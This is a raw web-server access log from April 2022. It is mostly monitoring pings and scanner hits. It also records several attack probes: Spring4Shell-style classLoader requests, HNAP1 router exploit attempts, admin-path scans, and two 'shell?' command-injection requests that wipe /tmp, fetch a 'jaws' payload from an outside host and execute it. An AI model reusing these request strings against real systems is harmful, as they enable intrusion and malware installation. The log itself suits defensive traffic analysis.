128.1.248.42 - - [01/Apr/2022:07:52:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [01/Apr/2022:07:53:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:07:54:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:07:55:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:07:56:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:07:57:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:07:58:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:07:59:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:08:00:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:08:01:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
39.74.175.245 - - [01/Apr/2022:08:01:27 +0200] "POST /HNAP1/ HTTP/1.0" 404 311 "-" "-"
212.91.246.72 - - [01/Apr/2022:08:02:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:08:03:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:08:04:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
159.65.168.4 - - [01/Apr/2022:08:05:08 +0200] "HEAD /spicons/apache_pb.gif HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)"
181.230.173.178 - - [01/Apr/2022:08:05:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [01/Apr/2022:08:05:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:08:06:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
51.254.59.113 - - [01/Apr/2022:08:06:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
212.91.246.72 - - [01/Apr/2022:08:07:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.31.7.62 - - [01/Apr/2022:08:08:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
64.31.7.62 - - [01/Apr/2022:08:08:06 +0200] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
212.91.246.72 - - [01/Apr/2022:08:08:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:08:09:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:08:10:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:08:11:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:08:12:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
157.245.70.127 - - [01/Apr/2022:08:13:19 +0200] "GET /ab2g HTTP/1.1" 400 329 "-" "-"
157.245.70.127 - - [01/Apr/2022:08:13:19 +0200] "GET /ab2h HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [01/Apr/2022:08:13:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:08:14:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:08:15:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.118.53.210 - - [01/Apr/2022:08:15:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [01/Apr/2022:08:16:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:08:17:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:08:18:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:08:19:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:08:20:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:08:21:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:08:22:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
92.118.160.13 - - [01/Apr/2022:08:22:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com"
212.91.246.72 - - [01/Apr/2022:08:23:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:08:24:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:08:25:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:08:26:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.118.53.210 - - [01/Apr/2022:08:26:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [01/Apr/2022:08:27:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:08:28:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:08:29:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:08:30:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:08:31:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:08:32:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
142.93.220.8 - - [01/Apr/2022:08:32:42 +0200] "POST /?class.module.classLoader.URLs%5B0%5D=0 HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
142.93.220.8 - - [01/Apr/2022:08:32:42 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
92.255.85.10 - - [01/Apr/2022:08:32:56 +0200] "\x03" 501 316 "-" "-"
212.91.246.72 - - [01/Apr/2022:08:33:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
92.255.85.10 - - [01/Apr/2022:08:34:10 +0200] "\x03" 501 316 "-" "-"
212.91.246.72 - - [01/Apr/2022:08:34:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
172.245.186.189 - - [01/Apr/2022:08:34:38 +0200] "POST /cgi-bin/index2.asp HTTP/1.1" 404 323 "http://212.91.246.86:80/cgi-bin/index2.asp" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 Edg/93.0.961.44"
23.251.102.74 - - [01/Apr/2022:08:35:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [01/Apr/2022:08:35:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
92.255.85.10 - - [01/Apr/2022:08:35:34 +0200] "\x03" 501 316 "-" "-"
92.255.85.10 - - [01/Apr/2022:08:36:22 +0200] "\x03" 501 316 "-" "-"
212.91.246.72 - - [01/Apr/2022:08:36:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:08:37:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:08:38:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
49.246.50.226 - - [01/Apr/2022:08:39:00 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+110.45.146.209/jaws;sh+/tmp/jaws HTTP/1.1" 404 306 "-" "Hello, world"
212.91.246.72 - - [01/Apr/2022:08:39:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:08:40:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:08:41:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:08:42:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.9.32.147 - - [01/Apr/2022:08:43:01 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [01/Apr/2022:08:43:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:08:44:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.9.32.147 - - [01/Apr/2022:08:44:43 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
92.255.85.10 - - [01/Apr/2022:08:45:12 +0200] "\x03" 501 316 "-" "-"
212.91.246.72 - - [01/Apr/2022:08:45:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
92.255.85.10 - - [01/Apr/2022:08:45:32 +0200] "\x03" 501 316 "-" "-"
138.59.221.72 - - [01/Apr/2022:08:45:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
92.255.85.10 - - [01/Apr/2022:08:46:01 +0200] "\x03" 501 316 "-" "-"
212.91.246.72 - - [01/Apr/2022:08:46:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:08:47:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
92.255.85.10 - - [01/Apr/2022:08:47:30 +0200] "\x03" 501 316 "-" "-"
194.31.98.117 - - [01/Apr/2022:08:47:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
194.31.98.117 - - [01/Apr/2022:08:47:46 +0200] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
212.91.246.72 - - [01/Apr/2022:08:48:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.9.32.147 - - [01/Apr/2022:08:49:08 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [01/Apr/2022:08:49:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.9.32.147 - - [01/Apr/2022:08:49:47 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [01/Apr/2022:08:50:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.9.32.147 - - [01/Apr/2022:08:50:43 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
95.9.32.147 - - [01/Apr/2022:08:51:01 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
95.9.32.147 - - [01/Apr/2022:08:51:16 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
95.9.32.147 - - [01/Apr/2022:08:51:22 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [01/Apr/2022:08:51:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:08:52:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
92.255.85.10 - - [01/Apr/2022:08:52:46 +0200] "\x03" 501 316 "-" "-"
212.91.246.72 - - [01/Apr/2022:08:53:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.9.32.147 - - [01/Apr/2022:08:53:31 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [01/Apr/2022:08:54:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:08:55:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
92.255.85.10 - - [01/Apr/2022:08:55:42 +0200] "\x03" 501 316 "-" "-"
64.31.7.206 - - [01/Apr/2022:08:55:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
95.9.32.147 - - [01/Apr/2022:08:56:17 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [01/Apr/2022:08:56:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:08:57:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:08:58:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:08:59:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:09:00:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:09:01:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:09:02:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:09:03:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:09:04:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:09:05:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
83.171.127.211 - - [01/Apr/2022:09:05:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [01/Apr/2022:09:06:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:09:07:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:09:08:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:09:09:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
211.65.193.11 - - [01/Apr/2022:09:09:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [01/Apr/2022:09:10:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:09:11:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:09:12:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
143.198.231.14 - - [01/Apr/2022:09:13:22 +0200] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
212.91.246.72 - - [01/Apr/2022:09:13:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.118.53.194 - - [01/Apr/2022:09:14:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
64.31.7.194 - - [01/Apr/2022:09:14:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
64.31.7.194 - - [01/Apr/2022:09:14:17 +0200] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
212.91.246.72 - - [01/Apr/2022:09:14:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:09:15:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:09:16:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:09:17:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.31.7.206 - - [01/Apr/2022:09:17:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Apr/2022:09:18:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:09:19:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:09:20:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:09:21:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.31.7.206 - - [01/Apr/2022:09:22:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Apr/2022:09:22:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:09:23:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:09:24:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:09:25:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:09:26:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:09:27:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:09:28:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.118.53.194 - - [01/Apr/2022:09:28:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
64.31.7.206 - - [01/Apr/2022:09:29:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Apr/2022:09:29:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:09:30:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
165.232.92.50 - - [01/Apr/2022:09:30:36 +0200] "POST /?class.module.classLoader.URLs%5B0%5D=0 HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
165.232.92.50 - - [01/Apr/2022:09:30:36 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
212.91.246.72 - - [01/Apr/2022:09:31:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:09:32:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
41.37.30.38 - - [01/Apr/2022:09:33:14 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ jswl.jdaili.xyz/jaws;sh+/tmp/jaws HTTP/1.1" 404 306 "-" "Hello, world"
212.91.246.72 - - [01/Apr/2022:09:33:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:09:34:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:09:35:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:09:36:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
128.14.141.34 - - [01/Apr/2022:09:36:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [01/Apr/2022:09:37:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Apr/2022:09:38:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.31.7.206 - - [01/Apr/2022:09:39:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
86.250.73.119 - - [01/Apr/2022:09:39:25 +0200] "GET /program/index.php?lang=en HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36"
86.250.73.119 - - [01/Apr/2022:09:39:25 +0200] "GET /phpmy/index.php?lang=en HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36"
86.250.73.119 - - [01/Apr/2022:09:39:25 +0200] "GET /mysql/pma/index.php?lang=en HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36"
